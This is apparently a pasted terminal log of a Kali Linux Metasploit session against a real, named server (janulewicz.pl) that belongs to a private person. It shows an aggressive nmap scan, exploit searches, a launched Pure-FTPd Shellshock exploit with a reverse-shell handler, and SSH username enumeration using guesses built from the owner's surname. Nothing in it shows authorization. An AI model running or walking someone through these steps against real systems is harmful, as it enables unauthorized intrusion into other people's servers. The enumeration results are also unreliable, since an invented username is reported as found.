· 5 years ago · Jun 20, 2020, 03:10 PM
1root@kali:~#
2root@kali:~#
3root@kali:~#
4root@kali:~# /etc/init.d/postgresql start
5Starting postgresql (via systemctl): postgresql.service.
6root@kali:~# msfconsole
7
8 ___ ____
9 ,-"" `. < HONK >
10 ,' _ e )`-._ / ----
11 / ,' `-._<.===-'
12 / /
13 / ;
14 _ / ;
15 (`._ _.-"" ""--..__,' |
16 <_ `-"" \
17 <`- :
18 (__ <__. ;
19 `-. '-.__. _.' /
20 \ `-.__,-' _,'
21 `._ , /__,-'
22 ""._\__,'< <____
23 | | `----.`.
24 | | \ `.
25 ; |___ \-``
26 \ --<
27 `.`.<
28 `-'
29
30
31
32 =[ metasploit v5.0.87-dev ]
33+ -- --=[ 2006 exploits - 1096 auxiliary - 343 post ]
34+ -- --=[ 562 payloads - 45 encoders - 10 nops ]
35+ -- --=[ 7 evasion ]
36
37Metasploit tip: Use the edit command to open the currently active module in your editor
38
39msf5 > banner
40 .;lxO0KXXXK0Oxl:.
41 ,o0WMMMMMMMMMMMMMMMMMMKd,
42 'xNMMMMMMMMMMMMMMMMMMMMMMMMMWx,
43 :KMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMK:
44 .KMMMMMMMMMMMMMMMWNNNWMMMMMMMMMMMMMMMX,
45 lWMMMMMMMMMMMXd:.. ..;dKMMMMMMMMMMMMo
46 xMMMMMMMMMMWd. .oNMMMMMMMMMMk
47 oMMMMMMMMMMx. dMMMMMMMMMMx
48.WMMMMMMMMM: :MMMMMMMMMM,
49xMMMMMMMMMo lMMMMMMMMMO
50NMMMMMMMMW ,cccccoMMMMMMMMMWlccccc;
51MMMMMMMMMX ;KMMMMMMMMMMMMMMMMMMX:
52NMMMMMMMMW. ;KMMMMMMMMMMMMMMX:
53xMMMMMMMMMd ,0MMMMMMMMMMK;
54.WMMMMMMMMMc 'OMMMMMM0,
55 lMMMMMMMMMMk. .kMMO'
56 dMMMMMMMMMMWd' ..
57 cWMMMMMMMMMMMNxc'. ##########
58 .0MMMMMMMMMMMMMMMMWc #+# #+#
59 ;0MMMMMMMMMMMMMMMo. +:+
60 .dNMMMMMMMMMMMMo +#++:++#+
61 'oOWMMMMMMMMo +:+
62 .,cdkO0K; :+: :+:
63 :::::::+:
64 Metasploit
65
66 =[ metasploit v5.0.87-dev ]
67+ -- --=[ 2006 exploits - 1096 auxiliary - 343 post ]
68+ -- --=[ 562 payloads - 45 encoders - 10 nops ]
69+ -- --=[ 7 evasion ]
70
71Metasploit tip: View all productivity tips with the tips command
72
73msf5 > nmap -A -p 1-10000 137.74.176.105
74[*] exec: nmap -A -p 1-10000 137.74.176.105
75
76Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-20 16:28 UTC
77Nmap scan report for janulewicz.pl (137.74.176.105)
78Host is up (0.057s latency).
79Not shown: 9981 filtered ports
80PORT STATE SERVICE VERSION
8120/tcp closed ftp-data
8221/tcp open ftp Pure-FTPd
8322/tcp open ssh OpenSSH 5.1p1 Debian 5 (protocol 2.0)
84| ssh-hostkey:
85| 1024 a4:a1:35:fb:6e:6e:35:0a:62:3b:6c:10:1f:22:a4:1b (DSA)
86|_ 2048 bc:97:3f:74:c7:d8:e1:ee:b5:50:a2:80:8c:f1:05:75 (RSA)
8725/tcp open smtp Postfix smtpd
88|_smtp-commands: gm4.pl, PIPELINING, SIZE 160857600, VRFY, ETRN, STARTTLS, AUTH PLAIN LOGIN, AUTH=PLAIN LOGIN, ENHANCEDSTATUSCODES, 8BITMIME, DSN,
89|_smtp-ntlm-info: ERROR: Script execution failed (use -d to debug)
9053/tcp open domain ISC BIND 9.9.5 (Debian Linux 8.0 (Jessie))
91| dns-nsid:
92|_ bind.version: 9.9.5-9+deb8u18-Debian
9380/tcp open http Apache httpd 2.4.10 ((Debian))
94|_http-title: Welcome!
95110/tcp open pop3 Dovecot pop3d
96|_pop3-capabilities: CAPA AUTH-RESP-CODE STLS SASL(PLAIN LOGIN) RESP-CODES TOP USER UIDL PIPELINING
97143/tcp open imap Dovecot imapd
98|_imap-capabilities: listed IMAP4rev1 ID OK SASL-IR LOGIN-REFERRALS capabilities AUTH=LOGINA0001 have Pre-login IDLE post-login LITERAL+ AUTH=PLAIN STARTTLS ENABLE more
99443/tcp open ssl/https?
100|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
101465/tcp open ssl/smtps?
102|_smtp-commands: Couldn't establish connection on port 465
103587/tcp open smtp Postfix smtpd
104|_smtp-commands: gm4.pl, PIPELINING, SIZE 160857600, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN,
105993/tcp open ssl/imaps?
106995/tcp open ssl/pop3s?
1071177/tcp closed dkmessenger
1087654/tcp closed unknown
1098087/tcp closed simplifymedia
1108765/tcp open ssh OpenSSH 6.7p1 Debian 5+deb8u8 (protocol 2.0)
111| ssh-hostkey:
112| 1024 f0:a4:a4:28:76:a9:8e:01:1b:17:a1:43:05:36:44:e1 (DSA)
113| 2048 a5:bd:f3:aa:fb:33:0e:d7:0d:af:20:76:5e:71:42:ba (RSA)
114| 256 3d:c2:00:16:63:f2:e4:a2:90:b7:d3:03:33:4e:88:01 (ECDSA)
115|_ 256 32:76:1a:a8:d9:fa:9c:44:7c:81:6e:f1:b2:fd:70:41 (ED25519)
1169080/tcp closed glrpc
1179876/tcp open ssl/http Apache httpd 2.4.10 ((Debian))
118| http-cookie-flags:
119| /:
120| PHPSESSID:
121|_ httponly flag not set
122| http-robots.txt: 1 disallowed entry
123|_/
124|_http-title: ISPConfig
125Aggressive OS guesses: Linux 3.11 - 4.1 (93%), Linux 4.4 (93%), Linux 3.16 (92%), Linux 3.13 (90%), Linux 3.10 - 3.16 (88%), Linux 2.6.32 (88%), Linux 3.2 - 3.8 (88%), Linux 3.8 (88%), WatchGuard Fireware 11.8 (88%), IPFire 2.11 firewall (Linux 2.6.32) (87%)
126No exact OS matches for host (test conditions non-ideal).
127Network Distance: 13 hops
128Service Info: Host: gm4.pl; OS: Linux; CPE: cpe:/o:linux:linux_kernel
129
130TRACEROUTE (using port 7654/tcp)
131HOP RTT ADDRESS
1321 14.19 ms 192.168.0.1
1332 ...
1343 28.78 ms pl-ktw01a-rc1-ae-18-0.aorta.net (84.116.253.129)
1354 26.11 ms pl-waw26b-rc1-ae-40-0.aorta.net (84.116.133.29)
1365 23.79 ms pl-waw02a-ri1-ae-0-0.aorta.net (84.116.138.94)
1376 26.49 ms var-5-a9.pl.eu (54.36.50.12)
1387 ...
1398 46.43 ms be101.fra-fr5-sbb2-nc5.de.eu (54.36.50.116)
1409 51.56 ms be103.rbx-g2-nc5.fr.eu (94.23.122.240)
14110 ... 12
14213 53.15 ms janulewicz.pl (137.74.176.105)
143
144OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
145Nmap done: 1 IP address (1 host up) scanned in 158.21 seconds
146msf5 > searchexploit Interrupt: use the 'exit' command to quit
147msf5 > searchexploit Pure-FTPd
148[-] Unknown command: searchexploit.
149msf5 > searchsploit Pure-FTPd
150[*] exec: searchsploit Pure-FTPd
151
152-------------------------------------------------------------------------------- ---------------------------------
153 Exploit Title | Path
154-------------------------------------------------------------------------------- ---------------------------------
155Pure-FTPd - External Authentication Bash Environment Variable Code Injection (M | linux/remote/34862.rb
156Pure-FTPd 1.0.21 (CentOS 6.2 / Ubuntu 8.04) - Null Pointer Dereference Crash (P | linux/dos/20479.pl
157-------------------------------------------------------------------------------- ---------------------------------
158Shellcodes: No Results
159msf5 > mfsconsole
160[-] Unknown command: mfsconsole.
161msf5 > search Pure-FTPd
162
163Matching Modules
164================
165
166 # Name Disclosure Date Rank Check Description
167 - ---- --------------- ---- ----- -----------
168 0 exploit/multi/ftp/pureftpd_bash_env_exec 2014-09-24 excellent Yes Pure-FTPd External Authentication Bash Environment Variable Code Injection (Shellshock)
169
170
171msf5 > use exploit/multi/ftp/pureftpd_bash_env_exec
172msf5 exploit(multi/ftp/pureftpd_bash_env_exec) > show option
173[-] Invalid parameter "option", use "show -h" for more information
174msf5 exploit(multi/ftp/pureftpd_bash_env_exec) > show options
175
176Module options (exploit/multi/ftp/pureftpd_bash_env_exec):
177
178 Name Current Setting Required Description
179 ---- --------------- -------- -----------
180 RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
181 RPATH /bin yes Target PATH for binaries used by the CmdStager
182 RPORT 21 yes The target port (TCP)
183 SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0
184 SRVPORT 8080 yes The local port to listen on.
185 SSL false no Negotiate SSL for incoming connections
186 SSLCert no Path to a custom SSL certificate (default is randomly generated)
187 URIPATH no The URI to use for this exploit (default is random)
188
189
190Exploit target:
191
192 Id Name
193 -- ----
194 0 Linux x86
195
196
197msf5 exploit(multi/ftp/pureftpd_bash_env_exec) > set RHOST
198[-] Unknown variable
199Usage: set [option] [value]
200
201Set the given option to value. If value is omitted, print the current value.
202If both are omitted, print options that are currently set.
203
204If run from a module context, this will set the value in the module's
205datastore. Use -g to operate on the global datastore.
206
207If setting a PAYLOAD, this command can take an index from `show payloads'.
208
209msf5 exploit(multi/ftp/pureftpd_bash_env_exec) > set RHOSTS
210[-] Unknown variable
211Usage: set [option] [value]
212
213Set the given option to value. If value is omitted, print the current value.
214If both are omitted, print options that are currently set.
215
216If run from a module context, this will set the value in the module's
217datastore. Use -g to operate on the global datastore.
218
219If setting a PAYLOAD, this command can take an index from `show payloads'.
220
221msf5 exploit(multi/ftp/pureftpd_bash_env_exec) > set RHOSTS 135.74.176.105
222RHOSTS => 135.74.176.105
223msf5 exploit(multi/ftp/pureftpd_bash_env_exec) > exploit
224
225[*] Started reverse TCP handler on 192.168.0.213:4444
226[-] 135.74.176.105:21 - Exploit failed [unreachable]: Rex::ConnectionTimeout The connection timed out (135.74.176.105:21).
227[*] Exploit completed, but no session was created.
228msf5 exploit(multi/ftp/pureftpd_bash_env_exec) > set RHOSTS 137.74.176.105
229RHOSTS => 137.74.176.105
230msf5 exploit(multi/ftp/pureftpd_bash_env_exec) > exploit
231
232[*] Started reverse TCP handler on 192.168.0.213:4444
233[*] 137.74.176.105:21 - Command Stager progress - 59.86% done (498/832 bytes)
234[*] 137.74.176.105:21 - Command Stager progress - 100.60% done (837/832 bytes)
235[*] Exploit completed, but no session was created.
236msf5 exploit(multi/ftp/pureftpd_bash_env_exec) > back
237msf5 > searchsploit OpenSSH 5.1p1
238[*] exec: searchsploit OpenSSH 5.1p1
239
240-------------------------------------------------------------------------------- ---------------------------------
241 Exploit Title | Path
242-------------------------------------------------------------------------------- ---------------------------------
243OpenSSH 2.3 < 7.7 - Username Enumeration | linux/remote/45233.py
244OpenSSH 2.3 < 7.7 - Username Enumeration (PoC) | linux/remote/45210.py
245OpenSSH < 6.6 SFTP (x64) - Command Execution | linux_x86-64/remote/45000.c
246OpenSSH < 6.6 SFTP - Command Execution | linux/remote/45001.py
247OpenSSH < 7.4 - 'UsePrivilegeSeparation Disabled' Forwarded Unix Domain Sockets | linux/local/40962.txt
248OpenSSH < 7.4 - agent Protocol Arbitrary Library Loading | linux/remote/40963.txt
249OpenSSH < 7.7 - User Enumeration (2) | linux/remote/45939.py
250-------------------------------------------------------------------------------- ---------------------------------
251Shellcodes: No Results
252msf5 > use linux_x86-64/remote/45000.c
253[-] No results from search
254[-] Failed to load module: linux_x86-64/remote/45000.c
255msf5 > search OpenSSH 5.1p1
256
257Matching Modules
258================
259
260 # Name Disclosure Date Rank Check Description
261 - ---- --------------- ---- ----- -----------
262 0 auxiliary/scanner/ssh/ssh_enumusers normal No SSH Username Enumeration
263 1 exploit/windows/local/unquoted_service_path 2001-10-25 excellent Yes Windows Unquoted Service Path Privilege Escalation
264 2 post/multi/gather/ssh_creds normal No Multi Gather OpenSSH PKI Credentials Collection
265 3 post/windows/manage/forward_pageant normal No Forward SSH Agent Requests To Remote Pageant
266 4 post/windows/manage/install_ssh normal No Install OpenSSH for Windows
267
268
269msf5 > searchsploit OpenSSH 6.7p1
270[*] exec: searchsploit OpenSSH 6.7p1
271
272-------------------------------------------------------------------------------- ---------------------------------
273 Exploit Title | Path
274-------------------------------------------------------------------------------- ---------------------------------
275OpenSSH 2.3 < 7.7 - Username Enumeration | linux/remote/45233.py
276OpenSSH 2.3 < 7.7 - Username Enumeration (PoC) | linux/remote/45210.py
277OpenSSH < 7.4 - 'UsePrivilegeSeparation Disabled' Forwarded Unix Domain Sockets | linux/local/40962.txt
278OpenSSH < 7.4 - agent Protocol Arbitrary Library Loading | linux/remote/40963.txt
279OpenSSH < 7.7 - User Enumeration (2) | linux/remote/45939.py
280-------------------------------------------------------------------------------- ---------------------------------
281Shellcodes: No Results
282msf5 > msfconsole
283[-] msfconsole cannot be run inside msfconsole
284msf5 > search OpenSSH 6.7p1
285
286Matching Modules
287================
288
289 # Name Disclosure Date Rank Check Description
290 - ---- --------------- ---- ----- -----------
291 0 auxiliary/scanner/ssh/ssh_enumusers normal No SSH Username Enumeration
292 1 exploit/windows/local/unquoted_service_path 2001-10-25 excellent Yes Windows Unquoted Service Path Privilege Escalation
293 2 post/multi/gather/ssh_creds normal No Multi Gather OpenSSH PKI Credentials Collection
294 3 post/windows/manage/forward_pageant normal No Forward SSH Agent Requests To Remote Pageant
295 4 post/windows/manage/install_ssh normal No Install OpenSSH for Windows
296
297
298msf5 > use auxiliary/scanner/ssh/ssh_enumusers
299msf5 auxiliary(scanner/ssh/ssh_enumusers) > set RHOSTS 137.74.176.105
300RHOSTS => 137.74.176.105
301msf5 auxiliary(scanner/ssh/ssh_enumusers) > exploit
302
303[*] 137.74.176.105:22 - SSH - Using malformed packet technique
304[-] Please populate USERNAME or USER_FILE
305[*] Scanned 1 of 1 hosts (100% complete)
306[*] Auxiliary module execution completed
307msf5 auxiliary(scanner/ssh/ssh_enumusers) > show options
308
309Module options (auxiliary/scanner/ssh/ssh_enumusers):
310
311 Name Current Setting Required Description
312 ---- --------------- -------- -----------
313 CHECK_FALSE false no Check for false positives (random username)
314 Proxies no A proxy chain of format type:host:port[,type:host:port][...]
315 RHOSTS 137.74.176.105 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
316 RPORT 22 yes The target port
317 THREADS 1 yes The number of concurrent threads (max one per host)
318 THRESHOLD 10 yes Amount of seconds needed before a user is considered found (timing attack only)
319 USERNAME no Single username to test (username spray)
320 USER_FILE no File containing usernames, one per line
321
322
323Auxiliary action:
324
325 Name Description
326 ---- -----------
327 Malformed Packet Use a malformed packet
328
329
330msf5 auxiliary(scanner/ssh/ssh_enumusers) > set USERPASS_FILE /usr/share/metasploit-framework/data/wordlists/root_userpass.txt
331USERPASS_FILE => /usr/share/metasploit-framework/data/wordlists/root_userpass.txt
332msf5 auxiliary(scanner/ssh/ssh_enumusers) > run
333
334[*] 137.74.176.105:22 - SSH - Using malformed packet technique
335[-] Please populate USERNAME or USER_FILE
336[*] Scanned 1 of 1 hosts (100% complete)
337[*] Auxiliary module execution completed
338msf5 auxiliary(scanner/ssh/ssh_enumusers) > set VERBOSE false
339VERBOSE => false
340msf5 auxiliary(scanner/ssh/ssh_enumusers) > run
341
342[*] 137.74.176.105:22 - SSH - Using malformed packet technique
343[-] Please populate USERNAME or USER_FILE
344[*] Scanned 1 of 1 hosts (100% complete)
345[*] Auxiliary module execution completed
346msf5 auxiliary(scanner/ssh/ssh_enumusers) > set USERNAME root
347USERNAME => root
348msf5 auxiliary(scanner/ssh/ssh_enumusers) > run
349
350[*] 137.74.176.105:22 - SSH - Using malformed packet technique
351[*] 137.74.176.105:22 - SSH - Starting scan
352[-] 137.74.176.105:22 - SSH - User 'root' not found
353[*] Scanned 1 of 1 hosts (100% complete)
354[*] Auxiliary module execution completed
355msf5 auxiliary(scanner/ssh/ssh_enumusers) > set USERNAME pjanulew
356USERNAME => pjanulew
357msf5 auxiliary(scanner/ssh/ssh_enumusers) > run
358
359[*] 137.74.176.105:22 - SSH - Using malformed packet technique
360[*] 137.74.176.105:22 - SSH - Starting scan
361[-] 137.74.176.105:22 - SSH - User 'pjanulew' not found
362[*] Scanned 1 of 1 hosts (100% complete)
363[*] Auxiliary module execution completed
364msf5 auxiliary(scanner/ssh/ssh_enumusers) > set USERNAME pjanulewicz
365USERNAME => pjanulewicz
366msf5 auxiliary(scanner/ssh/ssh_enumusers) > run
367
368[*] 137.74.176.105:22 - SSH - Using malformed packet technique
369[*] 137.74.176.105:22 - SSH - Starting scan
370[-] 137.74.176.105:22 - SSH - User 'pjanulewicz' not found
371[*] Scanned 1 of 1 hosts (100% complete)
372[*] Auxiliary module execution completed
373msf5 auxiliary(scanner/ssh/ssh_enumusers) > set RPORT 8765
374RPORT => 8765
375msf5 auxiliary(scanner/ssh/ssh_enumusers) > run
376
377[*] 137.74.176.105:8765 - SSH - Using malformed packet technique
378[*] 137.74.176.105:8765 - SSH - Starting scan
379[+] 137.74.176.105:8765 - SSH - User 'pjanulewicz' found
380[*] Scanned 1 of 1 hosts (100% complete)
381[*] Auxiliary module execution completed
382msf5 auxiliary(scanner/ssh/ssh_enumusers) > set USERNAME root
383USERNAME => root
384msf5 auxiliary(scanner/ssh/ssh_enumusers) > run
385
386[*] 137.74.176.105:8765 - SSH - Using malformed packet technique
387[*] 137.74.176.105:8765 - SSH - Starting scan
388[+] 137.74.176.105:8765 - SSH - User 'root' found
389[*] Scanned 1 of 1 hosts (100% complete)
390[*] Auxiliary module execution completed
391msf5 auxiliary(scanner/ssh/ssh_enumusers) > set USERNAME test1
392USERNAME => test1
393msf5 auxiliary(scanner/ssh/ssh_enumusers) > run
394
395[*] 137.74.176.105:8765 - SSH - Using malformed packet technique
396[*] 137.74.176.105:8765 - SSH - Starting scan
397[+] 137.74.176.105:8765 - SSH - User 'test1' found
398[*] Scanned 1 of 1 hosts (100% complete)
399[*] Auxiliary module execution completed
400msf5 auxiliary(scanner/ssh/ssh_enumusers) > set USERNAME niematakiego
401USERNAME => niematakiego
402msf5 auxiliary(scanner/ssh/ssh_enumusers) > run
403
404[*] 137.74.176.105:8765 - SSH - Using malformed packet technique
405[*] 137.74.176.105:8765 - SSH - Starting scan
406[+] 137.74.176.105:8765 - SSH - User 'niematakiego' found
407[*] Scanned 1 of 1 hosts (100% complete)
408[*] Auxiliary module execution completed
409msf5 auxiliary(scanner/ssh/ssh_enumusers) > back
410msf5 > searchsploit bind.version: 9.9.5-9+deb8u18-Debian
411[*] exec: searchsploit bind.version: 9.9.5-9+deb8u18-Debian
412
413Exploits: No Results
414Shellcodes: No Results
415msf5 > searchsploit bind.version: 9.9.5
416[*] exec: searchsploit bind.version: 9.9.5
417
418Exploits: No Results
419Shellcodes: No Results
420msf5 > searchsploit Apache httpd 2.4.10
421[*] exec: searchsploit Apache httpd 2.4.10
422
423Exploits: No Results
424Shellcodes: No Results
425msf5 > searchsploit Apache
426[*] exec: searchsploit Apache
427
428-------------------------------------------------------------------------------- ---------------------------------
429 Exploit Title | Path
430-------------------------------------------------------------------------------- ---------------------------------
431Apache (Windows x86) - Chunked Encoding (Metasploit) | windows_x86/remote/16782.rb
432Apache + PHP < 5.3.12 / < 5.4.2 - cgi-bin Remote Code Execution | php/remote/29290.c
433Apache + PHP < 5.3.12 / < 5.4.2 - Remote Code Execution + Scanner | php/remote/29316.py
434Apache - Arbitrary Long HTTP Headers Denial of Service (C) | linux/dos/371.c
435Apache - Arbitrary Long HTTP Headers Denial of Service (Perl) | multiple/dos/360.pl
436Apache - Denial of Service | linux/dos/18221.c
437Apache - httpOnly Cookie Disclosure | multiple/remote/18442.html
438Apache - Remote Memory Exhaustion (Denial of Service) | multiple/dos/17696.pl
439Apache 0.8.x/1.0.x / NCSA HTTPd 1.x - 'test-cgi' Directory Listing | cgi/remote/20435.txt
440Apache 1.0/1.2/1.3 - Server Address Disclosure | multiple/remote/21067.c
441Apache 1.1 / NCSA HTTPd 1.5.2 / Netscape Server 1.12/1.1/2.0 - a nph-test-cgi | multiple/dos/19536.txt
442Apache 1.2 - Denial of Service | multiple/dos/20558.txt
443Apache 1.2.5/1.3.1 / UnityMail 2.0 - MIME Header Denial of Service | windows/dos/20272.pl
444Apache 1.3 + PHP 3 - File Disclosure | multiple/remote/20466.txt
445Apache 1.3 - Artificially Long Slash Path Directory Listing (1) | multiple/remote/20692.pl
446Apache 1.3 - Artificially Long Slash Path Directory Listing (2) | multiple/remote/20693.c
447Apache 1.3 - Artificially Long Slash Path Directory Listing (3) | multiple/remote/20694.pl
448Apache 1.3 - Artificially Long Slash Path Directory Listing (4) | multiple/remote/20695.pl
449Apache 1.3 - Directory Index Disclosure | multiple/remote/21002.txt
450Apache 1.3.12 - WebDAV Directory Listings | linux/remote/20210.txt
451Apache 1.3.14 - Mac File Protection Bypass | osx/remote/20911.txt
452Apache 1.3.20 (Win32) - 'PHP.exe' Remote File Disclosure | windows/remote/21204.txt
453Apache 1.3.31 mod_include - Local Buffer Overflow | linux/local/587.c
454Apache 1.3.34/1.3.33 (Ubuntu / Debian) - CGI TTY Privilege Escalation | linux/local/3384.c
455Apache 1.3.35/2.0.58/2.2.2 - Arbitrary HTTP Request Headers Security | linux/remote/28424.txt
456Apache 1.3.6/1.3.9/1.3.11/1.3.12/1.3.20 - Root Directory Access | windows/remote/19975.pl
457Apache 1.3.x + Tomcat 4.0.x/4.1.x mod_jk - Chunked Encoding Denial of Service | unix/dos/22068.pl
458Apache 1.3.x - HTDigest Realm Command Line Argument Buffer Overflow (1) | unix/remote/25624.c
459Apache 1.3.x - HTDigest Realm Command Line Argument Buffer Overflow (2) | unix/remote/25625.c
460Apache 1.3.x < 2.0.48 mod_userdir - Remote Users Disclosure | linux/remote/132.c
461Apache 1.3.x mod_include - Local Buffer Overflow | linux/local/24694.c
462Apache 1.3.x mod_mylo - Remote Code Execution | multiple/remote/67.c
463Apache 1.3/2.0.x - Server Side Include Cross-Site Scripting | multiple/remote/21885.txt
464Apache 1.4/2.2.x - APR 'apr_fnmatch()' Denial of Service | linux/dos/35738.php
465Apache 1.x/2.0.x - Chunked-Encoding Memory Corruption (1) | multiple/remote/21559.c
466Apache 1.x/2.0.x - Chunked-Encoding Memory Corruption (2) | multiple/remote/21560.c
467Apache 2.0 - Encoded Backslash Directory Traversal | windows/remote/21697.txt
468Apache 2.0 - Full Path Disclosure | windows/remote/21719.txt
469Apache 2.0 mod_jk2 2.0.2 (Windows x86) - Remote Buffer Overflow | windows_x86/remote/5330.c
470Apache 2.0.39/40 - Oversized STDERR Buffer Denial of Service | linux/dos/21854.c
471Apache 2.0.44 (Linux) - Remote Denial of Service | linux/dos/11.c
472Apache 2.0.45 - 'APR' Crash | linux/dos/38.pl
473Apache 2.0.49 - Arbitrary Long HTTP Headers Denial of Service | multiple/dos/1056.pl
474Apache 2.0.4x mod_perl - File Descriptor Leakage (3) | linux/local/23581.pl
475Apache 2.0.4x mod_php - File Descriptor Leakage (1) | linux/local/23481.c
476Apache 2.0.4x mod_php - File Descriptor Leakage (2) | linux/local/23482.c
477Apache 2.0.52 - GET Denial of Service | multiple/dos/855.pl
478Apache 2.0.58 mod_rewrite (Windows 2003) - Remote Overflow | windows/remote/3996.c
479Apache 2.2 (Windows) - Local Denial of Service | windows/dos/15319.pl
480Apache 2.2 - Scoreboard Invalid Free On Shutdown | linux/dos/41768.txt
481Apache 2.2.14 mod_isapi - Dangling Pointer Remote SYSTEM | windows/remote/11650.c
482Apache 2.2.15 mod_proxy - Reverse Proxy Security Bypass | linux/remote/36663.txt
483Apache 2.2.2 - CGI Script Source Code Information Disclosure | multiple/remote/28365.txt
484Apache 2.2.4 - 413 Error HTTP Request Method Cross-Site Scripting | unix/remote/30835.sh
485Apache 2.2.6 (Windows) - Share PHP File Extension Mapping Information Disclosur | windows/remote/30901.txt
486Apache 2.2.6 mod_negotiation - HTML Injection / HTTP Response Splitting | linux/remote/31052.java
487Apache 2.4.17 - Denial of Service | windows/dos/39037.php
488Apache 2.4.17 < 2.4.38 - 'apache2ctl graceful' 'logrotate' Local Privilege Esca | linux/local/46676.php
489Apache 2.4.23 mod_http2 - Denial of Service | linux/dos/40909.py
490Apache 2.4.7 + PHP 7.0.2 - 'openssl_seal()' Uninitialized Memory Code Execution | php/remote/40142.php
491Apache 2.4.7 mod_status - Scoreboard Handling Race Condition | linux/dos/34133.txt
492Apache 2.x - Memory Leak | windows/dos/9.c
493Apache 7.0.x mod_proxy - Reverse Proxy Security Bypass | linux/remote/36352.txt
494Apache < 1.3.37/2.0.59/2.2.3 mod_rewrite - Remote Overflow | multiple/remote/2237.sh
495Apache < 2.0.64 / < 2.2.21 mod_setenvif - Integer Overflow | linux/dos/41769.txt
496Apache < 2.2.34 / < 2.4.27 - OPTIONS Memory Leak | linux/webapps/42745.py
497Apache ActiveMQ 5.11.1/5.13.2 - Directory Traversal / Command Execution | windows/remote/40857.txt
498Apache ActiveMQ 5.2/5.3 - Source Code Information Disclosure | multiple/remote/33868.txt
499Apache ActiveMQ 5.3 - 'admin/queueBrowse' Cross-Site Scripting | multiple/remote/33905.txt
500Apache ActiveMQ 5.x-5.11.1 - Directory Traversal Shell Upload (Metasploit) | windows/remote/48181.rb
501Apache APR - Hash Collision Denial of Service | linux/dos/36669.txt
502Apache Archiva 1.0 < 1.3.1 - Cross-Site Request Forgery | multiple/webapps/15710.txt
503Apache Archiva 1.3.9 - Multiple Cross-Site Request Forgery Vulnerabilities | xml/webapps/40109.txt
504Apache AXIS 1.0 - Non-Existent WSDL Path Information Disclosure | multiple/remote/29930.txt
505Apache Axis 1.4 - Remote Code Execution | multiple/remote/46682.py
506Apache Axis2 1.4.1 - Local File Inclusion | php/webapps/12721.txt
507Apache Axis2 1.x - '/axis2/axis2-admin' Session Fixation | multiple/remote/34186.txt
508Apache Axis2 Administration Console - (Authenticated) Cross-Site Scripting | multiple/webapps/12689.txt
509Apache cocoon 2.14/2.2 - Directory Traversal | multiple/remote/23282.txt
510Apache Commons FileUpload and Apache Tomcat - Denial of Service | multiple/dos/31615.rb
511Apache Continuum - Arbitrary Command Execution (Metasploit) | linux/remote/39945.rb
512Apache Continuum 1.4.2 - Multiple Vulnerabilities | java/webapps/39886.txt
513Apache CouchDB - Arbitrary Command Execution (Metasploit) | linux/remote/45019.rb
514Apache CouchDB 1.5.0 - 'uuids' Denial of Service | multiple/dos/32519.txt
515Apache CouchDB 1.7.0 / 2.x < 2.1.1 - Remote Privilege Escalation | linux/webapps/44498.py
516Apache CouchDB 2.0.0 - Local Privilege Escalation | windows/local/40865.txt
517Apache CouchDB 2.3.0 - Cross-Site Scripting | multiple/webapps/46406.txt
518Apache CouchDB 2.3.1 - Cross-Site Request Forgery / Cross-Site Scripting | multiple/webapps/46595.txt
519Apache CouchDB < 2.1.0 - Remote Code Execution | linux/webapps/44913.py
520Apache CXF < 2.5.10/2.6.7/2.7.4 - Denial of Service | multiple/dos/26710.txt
521Apache Cygwin 1.3.x/2.0.x - Directory Traversal | windows/remote/23751.txt
522Apache Geronimo 1.0 - Error Page Cross-Site Scripting | multiple/remote/27096.txt
523Apache Geronimo 2.1.3 - Multiple Directory Traversal Vulnerabilities | multiple/remote/8458.txt
524Apache Geronimo 2.1.x - '/console/portal/' URI Cross-Site Scripting | multiple/remote/32921.txt
525Apache Geronimo 2.1.x - '/console/portal/Server/Monitoring' Multiple Cross-Site | multiple/remote/32920.txt
526Apache Geronimo 2.1.x - Cross-Site Request Forgery (Multiple Admin Function) | multiple/remote/32922.html
527Apache Httpd mod_proxy - Error Page Cross-Site Scripting | multiple/webapps/47688.md
528Apache Httpd mod_rewrite - Open Redirects | multiple/webapps/47689.md
529Apache JackRabbit - WebDAV XML External Entity | java/webapps/37110.py
530Apache JackRabbit 1.4/1.5 Content Repository (JCR) - 'search.jsp?q' Cross-Site | jsp/webapps/32741.txt
531Apache JackRabbit 1.4/1.5 Content Repository (JCR) - 'swr.jsp?q' Cross-Site Scr | jsp/webapps/32742.txt
532Apache JackRabbit 2.0.0 - webapp XPath Injection | jsp/webapps/14617.txt
533Apache James Server 2.2 - SMTP Denial of Service | multiple/dos/27915.pl
534Apache James Server 2.3.2 - Insecure User Creation Arbitrary File Write (Metasp | linux/remote/48130.rb
535Apache James Server 2.3.2 - Remote Command Execution | linux/remote/35513.py
536Apache Jetspeed - Arbitrary File Upload (Metasploit) | java/remote/39643.rb
537Apache Libcloud Digital Ocean API - Local Information Disclosure | linux/local/38937.txt
538Apache Mina 2.0.13 - Remote Command Execution | multiple/remote/40382.txt
539Apache Mod_Access_Referer 1.0.2 - Null Pointer Dereference Denial of Service | multiple/dos/22505.txt
540Apache Mod_Auth_OpenID - Session Stealing | linux/local/18917.txt
541Apache mod_cgi - 'Shellshock' Remote Command Injection | linux/remote/34900.py
542Apache mod_dav / svn - Remote Denial of Service | multiple/dos/8842.pl
543Apache mod_gzip (with debug_mode) 1.2.26.1a - Remote Overflow | linux/remote/126.c
544Apache mod_jk 1.2.19 (Windows x86) - Remote Buffer Overflow | windows_x86/remote/6100.py
545Apache mod_jk 1.2.19/1.2.20 - Remote Buffer Overflow | multiple/remote/4093.pl
546Apache mod_perl - 'Apache::Status' / 'Apache2::Status' Cross-Site Scripting | multiple/remote/9993.txt
547Apache mod_proxy - Reverse Proxy Exposure | multiple/remote/17969.py
548Apache mod_rewrite (Windows x86) - Off-by-One Remote Overflow | windows_x86/remote/3680.sh
549Apache mod_rewrite - LDAP protocol Buffer Overflow (Metasploit) | windows/remote/16752.rb
550Apache mod_session_crypto - Padding Oracle | multiple/webapps/40961.py
551Apache mod_ssl 2.0.x - Remote Denial of Service | linux/dos/24590.txt
